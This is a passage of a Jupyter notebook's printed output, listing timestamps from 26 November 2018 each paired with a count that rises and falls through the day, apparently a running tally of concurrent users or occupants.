"['2018-11-26 06:02:11.982158', 4]\n",
"['2018-11-26 06:02:25.012466', 5]\n",
"['2018-11-26 06:02:31.531218', 6]\n",
"['2018-11-26 06:02:40.240092', 7]\n",
"['2018-11-26 06:02:45.748156', 8]\n",
"['2018-11-26 06:03:09.965732', 9]\n",
"['2018-11-26 06:03:36.478135', 8]\n",
"['2018-11-26 06:05:12.675850', 9]\n",
"['2018-11-26 06:06:03.368651', 10]\n",
"['2018-11-26 06:07:07.885174', 9]\n",
"['2018-11-26 06:07:12.673975', 8]\n",
"['2018-11-26 06:08:18.308201', 6]\n",
"['2018-11-26 06:09:59.127051', 5]\n",
"['2018-11-26 06:11:08.429949', 4]\n",
"['2018-11-26 06:13:36.977048', 5]\n",
"['2018-11-26 06:14:07.604014', 6]\n",
"['2018-11-26 06:14:14.892747', 7]\n",
"['2018-11-26 06:14:20.320342', 8]\n",
"['2018-11-26 06:14:35.539013', 7]\n",
"['2018-11-26 06:15:15.276443', 8]\n",
"['2018-11-26 06:19:26.019050', 9]\n",
"['2018-11-26 06:20:35.346708', 10]\n",
"['2018-11-26 06:21:31.855935', 9]\n",
"['2018-11-26 06:22:32.297884', 8]\n",
"['2018-11-26 06:24:28.073424', 9]\n",
"['2018-11-26 06:24:59.978858', 8]\n",
"['2018-11-26 06:25:59.454231', 7]\n",
"['2018-11-26 06:26:03.231181', 8]\n",
"['2018-11-26 06:26:33.722984', 7]\n",
"['2018-11-26 06:33:23.522950', 6]\n",
"['2018-11-26 06:34:03.366762', 4]\n",
"['2018-11-26 06:34:35.231045', 5]\n",
"['2018-11-26 06:36:04.638604', 4]\n",
"['2018-11-26 06:41:38.049794', 3]\n",
"['2018-11-26 06:47:28.623304', 4]\n",
"['2018-11-26 06:48:01.696650', 3]\n",
"['2018-11-26 06:48:19.154189', 4]\n",
"['2018-11-26 06:50:03.266911', 5]\n",
"['2018-11-26 06:50:12.226762', 6]\n",
"['2018-11-26 06:50:45.000306', 5]\n",
"['2018-11-26 06:52:21.019052', 4]\n",
"['2018-11-26 06:53:53.371239', 3]\n",
"['2018-11-26 07:02:58.774629', 4]\n",
"['2018-11-26 07:03:38.608696', 5]\n",
"['2018-11-26 07:07:06.369898', 4]\n",
"['2018-11-26 07:07:15.544688', 5]\n",
"['2018-11-26 07:07:58.777784', 4]\n",
"['2018-11-26 07:08:56.072159', 5]\n",
"['2018-11-26 07:10:09.896416', 6]\n",
"['2018-11-26 07:11:38.066414', 7]\n",
"['2018-11-26 07:13:00.805320', 6]\n",
"['2018-11-26 07:13:33.037347', 7]\n",
"['2018-11-26 07:13:43.576406', 8]\n",
"['2018-11-26 07:13:55.046185', 9]\n",
"['2018-11-26 07:13:58.358798', 10]\n",
"['2018-11-26 07:14:23.230631', 11]\n",
"['2018-11-26 07:14:30.240485', 10]\n",
"['2018-11-26 07:14:48.638431', 11]\n",
"['2018-11-26 07:15:02.170355', 12]\n",
"['2018-11-26 07:15:04.021272', 13]\n",
"['2018-11-26 07:15:48.640962', 12]\n",
"['2018-11-26 07:15:53.012808', 13]\n",
"['2018-11-26 07:17:37.728360', 14]\n",
"['2018-11-26 07:18:07.998080', 13]\n",
"['2018-11-26 07:18:24.299502', 12]\n",
"['2018-11-26 07:18:25.292598', 11]\n",
"['2018-11-26 07:19:22.694937', 12]\n",
"['2018-11-26 07:19:59.746074', 11]\n",
"['2018-11-26 07:20:12.620103', 12]\n",
"['2018-11-26 07:20:18.038272', 13]\n",
"['2018-11-26 07:20:45.847229', 14]\n",
"['2018-11-26 07:21:31.255934', 13]\n",
"['2018-11-26 07:21:52.832093', 12]\n",
"['2018-11-26 07:22:00.883210', 13]\n",
"['2018-11-26 07:22:24.960937', 14]\n",
"['2018-11-26 07:22:48.236040', 15]\n",
"['2018-11-26 07:23:16.336176', 14]\n",
"['2018-11-26 07:24:18.098725', 10]\n",
"['2018-11-26 07:24:20.819982', 11]\n",
"['2018-11-26 07:29:55.824071', 2]\n",
"['2018-11-26 07:30:06.807682', 3]\n",
"['2018-11-26 07:36:20.125522', 2]\n",
"['2018-11-26 07:37:21.310988', 3]\n",
"['2018-11-26 07:38:16.327422', 4]\n",
"['2018-11-26 07:41:56.727716', 3]\n",
"['2018-11-26 07:45:14.082943', 2]\n",
"['2018-11-26 07:46:52.243453', 3]\n",
"['2018-11-26 07:53:25.094321', 2]\n",
"['2018-11-26 07:54:37.786057', 3]\n",
"['2018-11-26 07:57:36.082330', 4]\n",
"['2018-11-26 07:57:45.474334', 5]\n",
"['2018-11-26 07:58:57.281097', 6]\n",
"['2018-11-26 08:00:53.674815', 7]\n",
"['2018-11-26 08:00:59.457419', 8]\n",
"['2018-11-26 08:01:27.290793', 7]\n",
"['2018-11-26 08:01:44.443057', 8]\n",
"['2018-11-26 08:01:57.924106', 9]\n",
"['2018-11-26 08:02:09.835822', 10]\n",
"['2018-11-26 08:02:37.149247', 11]\n",
"['2018-11-26 08:04:39.407521', 10]\n",
"['2018-11-26 08:04:59.846589', 9]\n",
"['2018-11-26 08:06:15.789280', 10]\n",
"['2018-11-26 08:06:36.665894', 11]\n",
"['2018-11-26 08:06:53.241822', 12]\n",
"['2018-11-26 08:07:08.676041', 13]\n",
"['2018-11-26 08:07:10.083279', 14]\n",
"['2018-11-26 08:07:23.241511', 15]\n",
"['2018-11-26 08:07:33.797834', 14]\n",
"['2018-11-26 08:08:02.045286', 15]\n",
"['2018-11-26 08:08:25.658470', 14]\n",
"['2018-11-26 08:09:37.293943', 13]\n",
"['2018-11-26 08:10:17.179392', 14]\n",
"['2018-11-26 08:11:00.424073', 15]\n",
"['2018-11-26 08:11:54.994246', 16]\n",
"['2018-11-26 08:12:03.829994', 15]\n",
"['2018-11-26 08:12:29.073487', 14]\n",
"['2018-11-26 08:12:38.213371', 15]\n",
"['2018-11-26 08:13:01.479250', 14]\n",
"['2018-11-26 08:13:18.295327', 15]\n",
"['2018-11-26 08:13:35.174228', 16]\n",
"['2018-11-26 08:13:40.260225', 17]\n",
"['2018-11-26 08:13:42.729627', 18]\n",
"['2018-11-26 08:13:53.584418', 19]\n",
"['2018-11-26 08:14:54.493781', 20]\n",
"['2018-11-26 08:15:06.860879', 19]\n",
"['2018-11-26 08:15:46.543578', 18]\n",
"['2018-11-26 08:15:57.257576', 19]\n",
"['2018-11-26 08:16:34.614831', 20]\n",
"['2018-11-26 08:16:43.063457', 19]\n",
"['2018-11-26 08:16:50.248598', 20]\n",
"['2018-11-26 08:17:36.720997', 19]\n",
"['2018-11-26 08:17:37.231991', 20]\n",
"['2018-11-26 08:17:45.962913', 18]\n",
"['2018-11-26 08:17:55.071799', 17]\n",
"['2018-11-26 08:18:30.753428', 18]\n",
"['2018-11-26 08:19:03.766102', 19]\n",
"['2018-11-26 08:19:25.435226', 20]\n",
"['2018-11-26 08:19:41.555696', 19]\n",
"['2018-11-26 08:19:47.242095', 18]\n",
"['2018-11-26 08:20:01.246655', 17]\n",
"['2018-11-26 08:20:08.096207', 18]\n",
"['2018-11-26 08:20:13.770895', 17]\n",
"['2018-11-26 08:20:15.996072', 18]\n",
"['2018-11-26 08:20:30.874089', 17]\n",
"['2018-11-26 08:20:38.226923', 16]\n",
"['2018-11-26 08:20:57.097259', 15]\n",
"['2018-11-26 08:21:11.327607', 16]\n",
"['2018-11-26 08:21:55.682492', 15]\n",
"['2018-11-26 08:22:04.349608', 16]\n",
"['2018-11-26 08:22:22.988032', 17]\n",
"['2018-11-26 08:22:35.721831', 18]\n",
"['2018-11-26 08:22:53.197568', 19]\n",
"['2018-11-26 08:22:53.849244', 20]\n",
"['2018-11-26 08:23:03.856845', 19]\n",
"['2018-11-26 08:23:46.624660', 18]\n",
"['2018-11-26 08:23:56.670420', 17]\n",
"['2018-11-26 08:24:50.568524', 16]\n",
"['2018-11-26 08:25:22.566063', 15]\n",
"['2018-11-26 08:25:24.121239', 14]\n",
"['2018-11-26 08:26:17.259783', 11]\n",
"['2018-11-26 08:26:57.472266', 10]\n",
"['2018-11-26 08:27:27.150947', 9]\n",
"['2018-11-26 08:27:47.476377', 7]\n",
"['2018-11-26 08:28:49.601785', 5]\n",
"['2018-11-26 08:29:53.045186', 6]\n",
"['2018-11-26 08:30:14.786414', 7]\n",
"['2018-11-26 08:30:21.512221', 8]\n",
"['2018-11-26 08:30:29.023756', 9]\n",
"['2018-11-26 08:31:26.084473', 10]\n",
"['2018-11-26 08:32:49.983768', 11]\n",
"['2018-11-26 08:32:52.290193', 12]\n",
"['2018-11-26 08:33:13.981987', 13]\n",
"['2018-11-26 08:33:46.909965', 14]\n",
"['2018-11-26 08:33:49.905587', 15]\n",
"['2018-11-26 08:35:38.223049', 16]\n",
"['2018-11-26 08:36:30.361062', 15]\n",
"['2018-11-26 08:37:33.623818', 14]\n",
"['2018-11-26 08:37:33.920039', 15]\n",
"['2018-11-26 08:37:36.351529', 16]\n",
"['2018-11-26 08:39:40.259943', 15]\n",
"['2018-11-26 08:40:12.843236', 14]\n",
"['2018-11-26 08:41:53.116627', 13]\n",
"['2018-11-26 08:42:14.089621', 11]\n",
"['2018-11-26 08:42:32.804288', 10]\n",
"['2018-11-26 08:43:43.883951', 9]\n",
"['2018-11-26 08:43:51.392966', 8]\n",
"['2018-11-26 08:43:51.929101', 9]\n",
"['2018-11-26 08:44:19.904060', 8]\n",
"['2018-11-26 08:45:02.666979', 9]\n",
"['2018-11-26 08:46:17.380334', 8]\n",
"['2018-11-26 08:46:38.436497', 7]\n",
"['2018-11-26 08:47:54.986199', 6]\n",
"['2018-11-26 08:49:48.768178', 5]\n",
"['2018-11-26 08:49:53.946609', 4]\n",
"['2018-11-26 08:50:19.224432', 3]\n",
"['2018-11-26 08:52:11.647017', 4]\n",
"['2018-11-26 08:53:49.577001', 5]\n",
"['2018-11-26 08:54:16.331216', 6]\n",
"['2018-11-26 08:54:33.125113', 7]\n",
"['2018-11-26 08:55:14.742635', 8]\n",
"['2018-11-26 08:55:47.976325', 9]\n",
"['2018-11-26 08:56:13.111818', 8]\n",
"['2018-11-26 08:56:37.397471', 7]\n",
"['2018-11-26 08:57:07.476067', 6]\n",
"['2018-11-26 08:58:13.289102', 5]\n",
"['2018-11-26 08:58:42.179699', 4]\n",
"['2018-11-26 08:59:15.189071', 5]\n",
"['2018-11-26 09:01:47.199572', 4]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 09:02:34.640235', 5]\n",
"['2018-11-26 09:03:12.214788', 6]\n",
"['2018-11-26 09:03:52.104248', 7]\n",
"['2018-11-26 09:04:29.841486', 8]\n",
"['2018-11-26 09:04:52.487559', 9]\n",
"['2018-11-26 09:05:47.930141', 8]\n",
"['2018-11-26 09:06:34.776245', 7]\n",
"['2018-11-26 09:07:28.477279', 5]\n",
"['2018-11-26 09:08:23.583190', 4]\n",
"['2018-11-26 09:13:39.492418', 3]\n",
"['2018-11-26 09:14:15.816849', 4]\n",
"['2018-11-26 09:14:55.602263', 5]\n",
"['2018-11-26 09:22:00.704490', 4]\n",
"['2018-11-26 09:22:04.648529', 5]\n",
"['2018-11-26 09:22:43.060755', 6]\n",
"['2018-11-26 09:23:02.909153', 7]\n",
"['2018-11-26 09:23:48.766869', 6]\n",
"['2018-11-26 09:24:00.563381', 7]\n",
"['2018-11-26 09:24:22.386807', 8]\n",
"['2018-11-26 09:24:53.144594', 9]\n",
"['2018-11-26 09:25:34.827567', 10]\n",
"['2018-11-26 09:25:48.728030', 11]\n",
"['2018-11-26 09:25:56.552111', 12]\n",
"['2018-11-26 09:26:02.059028', 13]\n",
"['2018-11-26 09:26:43.258575', 12]\n",
"['2018-11-26 09:27:21.996004', 13]\n",
"['2018-11-26 09:27:43.205786', 12]\n",
"['2018-11-26 09:29:06.452117', 9]\n",
"['2018-11-26 09:29:10.188595', 10]\n",
"['2018-11-26 09:29:11.054440', 11]\n",
"['2018-11-26 09:29:17.955729', 12]\n",
"['2018-11-26 09:29:44.402329', 11]\n",
"['2018-11-26 09:29:57.299165', 12]\n",
"['2018-11-26 09:30:07.575501', 13]\n",
"['2018-11-26 09:30:20.667222', 14]\n",
"['2018-11-26 09:30:30.468270', 15]\n",
"['2018-11-26 09:30:53.691270', 14]\n",
"['2018-11-26 09:30:59.700146', 12]\n",
"['2018-11-26 09:31:39.642027', 11]\n",
"['2018-11-26 09:31:53.567016', 10]\n",
"['2018-11-26 09:31:58.252740', 11]\n",
"['2018-11-26 09:33:21.663147', 9]\n",
"['2018-11-26 09:34:02.734887', 8]\n",
"['2018-11-26 09:34:14.012337', 7]\n",
"['2018-11-26 09:35:35.585854', 6]\n",
"['2018-11-26 09:36:11.916182', 5]\n",
"['2018-11-26 09:36:39.441418', 6]\n",
"['2018-11-26 09:39:18.648540', 5]\n",
"['2018-11-26 09:40:36.798086', 6]\n",
"['2018-11-26 09:43:36.600332', 5]\n",
"['2018-11-26 09:45:40.645252', 3]\n",
"['2018-11-26 09:56:51.525056', 2]\n",
"['2018-11-26 10:04:46.496269', 3]\n",
"['2018-11-26 10:12:44.143579', 2]\n",
"['2018-11-26 10:12:45.331786', 3]\n",
"['2018-11-26 10:12:49.565044', 4]\n",
"['2018-11-26 10:12:50.782709', 5]\n",
"['2018-11-26 10:13:06.288459', 6]\n",
"['2018-11-26 10:13:07.499133', 7]\n",
"['2018-11-26 10:13:17.346646', 8]\n",
"['2018-11-26 10:13:29.891085', 9]\n",
"['2018-11-26 10:13:30.546280', 10]\n",
"['2018-11-26 10:13:33.031079', 11]\n",
"['2018-11-26 10:13:54.892843', 12]\n",
"['2018-11-26 10:14:11.977583', 13]\n",
"['2018-11-26 10:14:47.513066', 14]\n",
"['2018-11-26 10:14:57.318876', 15]\n",
"['2018-11-26 10:15:17.538032', 16]\n",
"['2018-11-26 10:18:06.722349', 13]\n",
"['2018-11-26 10:18:25.480679', 14]\n",
"['2018-11-26 10:19:15.353117', 12]\n",
"['2018-11-26 10:19:23.362516', 11]\n",
"['2018-11-26 10:19:48.352904', 10]\n",
"['2018-11-26 10:19:56.352856', 9]\n",
"['2018-11-26 10:20:01.848994', 7]\n",
"['2018-11-26 10:20:03.879084', 8]\n",
"['2018-11-26 10:20:08.289073', 6]\n",
"['2018-11-26 10:20:47.479099', 7]\n",
"['2018-11-26 10:20:55.092560', 8]\n",
"['2018-11-26 10:21:07.000348', 9]\n",
"['2018-11-26 10:21:15.568919', 10]\n",
"['2018-11-26 10:21:22.231829', 11]\n",
"['2018-11-26 10:21:49.987745', 12]\n",
"['2018-11-26 10:22:26.311989', 11]\n",
"['2018-11-26 10:22:29.496543', 12]\n",
"['2018-11-26 10:22:39.702394', 13]\n",
"['2018-11-26 10:22:42.562769', 14]\n",
"['2018-11-26 10:22:50.465847', 15]\n",
"['2018-11-26 10:23:25.846221', 16]\n",
"['2018-11-26 10:24:11.102175', 15]\n",
"['2018-11-26 10:25:18.177251', 14]\n",
"['2018-11-26 10:26:01.860991', 13]\n",
"['2018-11-26 10:26:15.033863', 14]\n",
"['2018-11-26 10:26:17.393769', 15]\n",
"['2018-11-26 10:26:20.862545', 13]\n",
"['2018-11-26 10:26:44.821416', 11]\n",
"['2018-11-26 10:27:34.986706', 12]\n",
"['2018-11-26 10:27:35.968331', 11]\n",
"['2018-11-26 10:27:44.829560', 10]\n",
"['2018-11-26 10:28:13.508227', 9]\n",
"['2018-11-26 10:29:15.075690', 8]\n",
"['2018-11-26 10:30:08.258572', 6]\n",
"['2018-11-26 10:30:54.511552', 7]\n",
"['2018-11-26 10:32:07.122324', 5]\n",
"['2018-11-26 10:34:08.262304', 4]\n",
"['2018-11-26 10:36:15.157545', 3]\n",
"['2018-11-26 10:38:38.886271', 4]\n",
"['2018-11-26 10:39:08.261661', 5]\n",
"['2018-11-26 10:41:15.213551', 6]\n",
"['2018-11-26 10:43:02.630072', 4]\n",
"['2018-11-26 10:47:56.939419', 5]\n",
"['2018-11-26 10:49:08.272769', 6]\n",
"['2018-11-26 10:50:54.513550', 5]\n",
"['2018-11-26 10:52:16.528924', 6]\n",
"['2018-11-26 10:53:37.062726', 5]\n",
"['2018-11-26 10:54:17.902878', 6]\n",
"['2018-11-26 10:54:49.044991', 7]\n",
"['2018-11-26 10:55:05.068283', 6]\n",
"['2018-11-26 10:55:08.338990', 7]\n",
"['2018-11-26 10:56:02.171102', 8]\n",
"['2018-11-26 10:56:10.786878', 7]\n",
"['2018-11-26 10:56:21.938085', 8]\n",
"['2018-11-26 10:56:33.025179', 9]\n",
"['2018-11-26 10:56:37.821779', 10]\n",
"['2018-11-26 10:56:55.088857', 9]\n",
"['2018-11-26 10:57:40.356173', 8]\n",
"['2018-11-26 10:57:53.887856', 9]\n",
"['2018-11-26 11:00:53.692169', 8]\n",
"['2018-11-26 11:01:08.477057', 9]\n",
"['2018-11-26 11:02:02.342492', 8]\n",
"['2018-11-26 11:04:20.296008', 4]\n",
"['2018-11-26 11:08:00.586142', 3]\n",
"['2018-11-26 11:08:21.122496', 2]\n",
"['2018-11-26 11:15:36.503505', 3]\n",
"['2018-11-26 11:18:03.507808', 4]\n",
"['2018-11-26 11:20:53.904654', 5]\n",
"['2018-11-26 11:22:01.866632', 6]\n",
"['2018-11-26 11:22:20.040779', 7]\n",
"['2018-11-26 11:22:25.636233', 8]\n",
"['2018-11-26 11:24:16.170824', 7]\n",
"['2018-11-26 11:24:30.050755', 8]\n",
"['2018-11-26 11:24:33.676719', 9]\n",
"['2018-11-26 11:26:18.072935', 10]\n",
"['2018-11-26 11:26:25.284587', 9]\n",
"['2018-11-26 11:27:19.098953', 10]\n",
"['2018-11-26 11:27:24.683060', 11]\n",
"['2018-11-26 11:27:29.683555', 12]\n",
"['2018-11-26 11:27:37.030775', 13]\n",
"['2018-11-26 11:27:44.693245', 12]\n",
"['2018-11-26 11:27:53.035815', 13]\n",
"['2018-11-26 11:27:53.158750', 14]\n",
"['2018-11-26 11:27:55.497968', 15]\n",
"['2018-11-26 11:28:10.965288', 16]\n",
"['2018-11-26 11:28:53.035314', 13]\n",
"['2018-11-26 11:29:29.784000', 14]\n",
"['2018-11-26 11:29:33.902061', 15]\n",
"['2018-11-26 11:29:58.003636', 16]\n",
"['2018-11-26 11:30:10.540006', 17]\n",
"['2018-11-26 11:30:38.167603', 18]\n",
"['2018-11-26 11:30:50.379625', 17]\n",
"['2018-11-26 11:30:54.421903', 16]\n",
"['2018-11-26 11:31:29.213525', 17]\n",
"['2018-11-26 11:31:29.732410', 18]\n",
"['2018-11-26 11:31:59.258853', 17]\n",
"['2018-11-26 11:32:11.744319', 16]\n",
"['2018-11-26 11:33:00.264982', 15]\n",
"['2018-11-26 11:33:07.677634', 16]\n",
"['2018-11-26 11:33:24.144315', 17]\n",
"['2018-11-26 11:33:34.437958', 16]\n",
"['2018-11-26 11:33:34.930020', 17]\n",
"['2018-11-26 11:33:42.771967', 18]\n",
"['2018-11-26 11:33:54.407867', 17]\n",
"['2018-11-26 11:33:57.385551', 18]\n",
"['2018-11-26 11:34:00.575817', 19]\n",
"['2018-11-26 11:34:12.206169', 17]\n",
"['2018-11-26 11:34:24.162864', 18]\n",
"['2018-11-26 11:34:30.662970', 19]\n",
"['2018-11-26 11:34:47.736712', 17]\n",
"['2018-11-26 11:35:25.033280', 16]\n",
"['2018-11-26 11:35:59.883428', 15]\n",
"['2018-11-26 11:36:25.100197', 14]\n",
"['2018-11-26 11:37:31.688696', 13]\n",
"['2018-11-26 11:37:39.535553', 12]\n",
"['2018-11-26 11:38:13.014054', 9]\n",
"['2018-11-26 11:38:41.229971', 6]\n",
"['2018-11-26 11:39:20.681193', 5]\n",
"['2018-11-26 11:42:31.993750', 4]\n",
"['2018-11-26 11:42:32.382528', 5]\n",
"['2018-11-26 11:44:34.299983', 4]\n",
"['2018-11-26 11:45:35.309938', 3]\n",
"['2018-11-26 11:46:36.863001', 2]\n",
"['2018-11-26 11:47:14.653059', 3]\n",
"['2018-11-26 11:55:07.211095', 2]\n",
"['2018-11-26 12:02:26.105530', 3]\n",
"['2018-11-26 12:04:33.540669', 4]\n",
"['2018-11-26 12:06:49.691762', 5]\n",
"['2018-11-26 12:06:51.685823', 6]\n",
"['2018-11-26 12:07:28.043449', 7]\n",
"['2018-11-26 12:09:02.329631', 6]\n",
"['2018-11-26 12:09:07.135688', 5]\n",
"['2018-11-26 12:09:38.477513', 4]\n",
"['2018-11-26 12:09:40.948871', 5]\n",
"['2018-11-26 12:11:02.497378', 6]\n",
"['2018-11-26 12:11:52.164750', 7]\n",
"['2018-11-26 12:12:08.156351', 8]\n",
"['2018-11-26 12:12:39.624204', 9]\n",
"['2018-11-26 12:13:02.810450', 10]\n",
"['2018-11-26 12:13:13.813485', 9]\n",
"['2018-11-26 12:13:17.235440', 10]\n",
"['2018-11-26 12:13:25.589057', 11]\n",
"['2018-11-26 12:13:29.455982', 12]\n",
"['2018-11-26 12:13:45.645774', 13]\n",
"['2018-11-26 12:13:46.064441', 14]\n",
"['2018-11-26 12:13:53.828381', 15]\n",
"['2018-11-26 12:14:20.967043', 16]\n",
"['2018-11-26 12:14:34.518365', 17]\n",
"['2018-11-26 12:14:50.430384', 18]\n",
"['2018-11-26 12:15:00.166613', 19]\n",
"['2018-11-26 12:15:01.408979', 20]\n",
"['2018-11-26 12:15:05.058024', 21]\n",
"['2018-11-26 12:15:05.246729', 22]\n",
"['2018-11-26 12:15:08.646412', 23]\n",
"['2018-11-26 12:15:28.447809', 22]\n",
"['2018-11-26 12:15:53.843531', 21]\n",
"['2018-11-26 12:16:07.269341', 22]\n",
"['2018-11-26 12:16:38.653993', 23]\n",
"['2018-11-26 12:16:40.147569', 24]\n",
"['2018-11-26 12:16:45.015366', 25]\n",
"['2018-11-26 12:17:02.907265', 24]\n",
"['2018-11-26 12:17:47.337500', 25]\n",
"['2018-11-26 12:18:06.799784', 26]\n",
"['2018-11-26 12:18:06.958626', 27]\n",
"['2018-11-26 12:18:16.788837', 28]\n",
"['2018-11-26 12:18:40.877540', 27]\n",
"['2018-11-26 12:19:04.584760', 26]\n",
"['2018-11-26 12:19:09.556636', 27]\n",
"['2018-11-26 12:19:37.118770', 26]\n",
"['2018-11-26 12:19:40.099989', 27]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 12:19:45.016475', 26]\n",
"['2018-11-26 12:19:49.998088', 24]\n",
"['2018-11-26 12:19:52.987585', 25]\n",
"['2018-11-26 12:20:02.805053', 24]\n",
"['2018-11-26 12:20:10.815833', 21]\n",
"['2018-11-26 12:20:34.285905', 22]\n",
"['2018-11-26 12:20:41.732595', 21]\n",
"['2018-11-26 12:20:52.986090', 19]\n",
"['2018-11-26 12:21:21.178948', 20]\n",
"['2018-11-26 12:21:36.893291', 19]\n",
"['2018-11-26 12:21:48.924893', 18]\n",
"['2018-11-26 12:21:49.756561', 17]\n",
"['2018-11-26 12:22:02.637027', 18]\n",
"['2018-11-26 12:22:03.751701', 19]\n",
"['2018-11-26 12:22:08.362065', 18]\n",
"['2018-11-26 12:23:48.113935', 16]\n",
"['2018-11-26 12:24:17.535692', 17]\n",
"['2018-11-26 12:25:05.944166', 16]\n",
"['2018-11-26 12:25:22.072401', 17]\n",
"['2018-11-26 12:25:24.097069', 16]\n",
"['2018-11-26 12:26:13.976852', 13]\n",
"['2018-11-26 12:26:29.566901', 12]\n",
"['2018-11-26 12:26:46.518797', 9]\n",
"['2018-11-26 12:27:15.154418', 7]\n",
"['2018-11-26 12:29:24.285495', 4]\n",
"['2018-11-26 12:30:57.172198', 5]\n",
"['2018-11-26 12:32:47.082910', 4]\n",
"['2018-11-26 12:33:32.669568', 5]\n",
"['2018-11-26 12:34:37.441676', 6]\n",
"['2018-11-26 12:35:08.537411', 5]\n",
"['2018-11-26 12:36:04.146998', 6]\n",
"['2018-11-26 12:39:04.716926', 5]\n",
"['2018-11-26 12:40:06.076031', 4]\n",
"['2018-11-26 12:43:13.556801', 5]\n",
"['2018-11-26 12:46:52.128575', 4]\n",
"['2018-11-26 12:49:40.360541', 5]\n",
"['2018-11-26 12:51:19.229362', 6]\n",
"['2018-11-26 12:51:38.254516', 7]\n",
"['2018-11-26 12:52:53.327497', 8]\n",
"['2018-11-26 12:53:00.271110', 9]\n",
"['2018-11-26 12:53:45.904261', 8]\n",
"['2018-11-26 12:54:34.785264', 7]\n",
"['2018-11-26 12:54:55.411402', 6]\n",
"['2018-11-26 12:55:41.011312', 7]\n",
"['2018-11-26 12:56:03.000930', 8]\n",
"['2018-11-26 12:56:14.894768', 9]\n",
"['2018-11-26 12:56:29.610531', 10]\n",
"['2018-11-26 12:57:26.334294', 9]\n",
"['2018-11-26 12:57:53.815032', 8]\n",
"['2018-11-26 12:58:54.373014', 9]\n",
"['2018-11-26 12:59:33.279243', 10]\n",
"['2018-11-26 12:59:47.646939', 9]\n",
"['2018-11-26 13:00:14.377110', 10]\n",
"['2018-11-26 13:00:17.325264', 9]\n",
"['2018-11-26 13:00:29.631283', 8]\n",
"['2018-11-26 13:00:49.922872', 9]\n",
"['2018-11-26 13:01:25.780108', 10]\n",
"['2018-11-26 13:01:37.179015', 11]\n",
"['2018-11-26 13:02:05.219158', 10]\n",
"['2018-11-26 13:02:55.934535', 9]\n",
"['2018-11-26 13:04:10.456174', 10]\n",
"['2018-11-26 13:05:40.822025', 9]\n",
"['2018-11-26 13:08:06.039803', 10]\n",
"['2018-11-26 13:08:11.371558', 9]\n",
"['2018-11-26 13:09:09.153190', 10]\n",
"['2018-11-26 13:09:16.747548', 11]\n",
"['2018-11-26 13:10:02.536193', 12]\n",
"['2018-11-26 13:12:45.216994', 13]\n",
"['2018-11-26 13:13:43.554988', 12]\n",
"['2018-11-26 13:14:01.616558', 13]\n",
"['2018-11-26 13:17:04.834604', 14]\n",
"['2018-11-26 13:17:08.404898', 13]\n",
"['2018-11-26 13:17:24.640893', 14]\n",
"['2018-11-26 13:17:46.768122', 15]\n",
"['2018-11-26 13:17:52.866292', 14]\n",
"['2018-11-26 13:17:59.350739', 15]\n",
"['2018-11-26 13:20:01.247633', 16]\n",
"['2018-11-26 13:21:13.790811', 15]\n",
"['2018-11-26 13:22:00.713612', 14]\n",
"['2018-11-26 13:22:06.351151', 15]\n",
"['2018-11-26 13:22:25.159664', 14]\n",
"['2018-11-26 13:22:43.865438', 15]\n",
"['2018-11-26 13:22:51.777326', 16]\n",
"['2018-11-26 13:23:33.165082', 17]\n",
"['2018-11-26 13:23:35.702462', 18]\n",
"['2018-11-26 13:23:54.765377', 19]\n",
"['2018-11-26 13:24:02.918572', 18]\n",
"['2018-11-26 13:25:02.843954', 19]\n",
"['2018-11-26 13:25:11.537199', 20]\n",
"['2018-11-26 13:25:34.782227', 19]\n",
"['2018-11-26 13:25:41.138893', 20]\n",
"['2018-11-26 13:26:01.659846', 21]\n",
"['2018-11-26 13:26:45.260854', 22]\n",
"['2018-11-26 13:26:48.062498', 23]\n",
"['2018-11-26 13:27:31.486133', 22]\n",
"['2018-11-26 13:27:53.732328', 23]\n",
"['2018-11-26 13:28:14.676232', 22]\n",
"['2018-11-26 13:28:33.870554', 21]\n",
"['2018-11-26 13:28:50.094856', 20]\n",
"['2018-11-26 13:28:51.385878', 21]\n",
"['2018-11-26 13:29:03.897207', 20]\n",
"['2018-11-26 13:29:10.920563', 19]\n",
"['2018-11-26 13:29:13.395327', 20]\n",
"['2018-11-26 13:29:44.364377', 19]\n",
"['2018-11-26 13:29:47.419614', 20]\n",
"['2018-11-26 13:30:01.428348', 21]\n",
"['2018-11-26 13:30:03.990979', 20]\n",
"['2018-11-26 13:30:28.282163', 21]\n",
"['2018-11-26 13:30:34.956711', 20]\n",
"['2018-11-26 13:30:39.959488', 19]\n",
"['2018-11-26 13:30:45.882342', 18]\n",
"['2018-11-26 13:30:58.851437', 17]\n",
"['2018-11-26 13:31:07.077851', 18]\n",
"['2018-11-26 13:31:09.689660', 19]\n",
"['2018-11-26 13:31:10.385377', 20]\n",
"['2018-11-26 13:31:24.264579', 21]\n",
"['2018-11-26 13:31:39.553294', 20]\n",
"['2018-11-26 13:31:51.392564', 19]\n",
"['2018-11-26 13:32:15.363934', 18]\n",
"['2018-11-26 13:32:59.883690', 19]\n",
"['2018-11-26 13:33:09.267432', 20]\n",
"['2018-11-26 13:33:14.943939', 21]\n",
"['2018-11-26 13:33:26.478445', 22]\n",
"['2018-11-26 13:33:41.085718', 23]\n",
"['2018-11-26 13:33:44.663543', 24]\n",
"['2018-11-26 13:33:53.643009', 23]\n",
"['2018-11-26 13:34:01.568586', 24]\n",
"['2018-11-26 13:34:06.029117', 23]\n",
"['2018-11-26 13:34:12.681457', 24]\n",
"['2018-11-26 13:34:25.351295', 25]\n",
"['2018-11-26 13:34:39.890329', 26]\n",
"['2018-11-26 13:34:48.034555', 27]\n",
"['2018-11-26 13:35:08.965913', 26]\n",
"['2018-11-26 13:35:12.476304', 25]\n",
"['2018-11-26 13:35:25.373806', 24]\n",
"['2018-11-26 13:35:42.030263', 25]\n",
"['2018-11-26 13:35:46.337623', 26]\n",
"['2018-11-26 13:35:58.474256', 27]\n",
"['2018-11-26 13:36:09.837873', 26]\n",
"['2018-11-26 13:36:15.355947', 27]\n",
"['2018-11-26 13:36:20.044643', 28]\n",
"['2018-11-26 13:36:20.872396', 29]\n",
"['2018-11-26 13:37:00.588187', 28]\n",
"['2018-11-26 13:37:09.820044', 27]\n",
"['2018-11-26 13:37:20.822079', 26]\n",
"['2018-11-26 13:38:02.481775', 25]\n",
"['2018-11-26 13:38:08.779473', 24]\n",
"['2018-11-26 13:38:20.240585', 23]\n",
"['2018-11-26 13:38:26.163856', 22]\n",
"['2018-11-26 13:39:24.792835', 21]\n",
"['2018-11-26 13:39:46.292344', 22]\n",
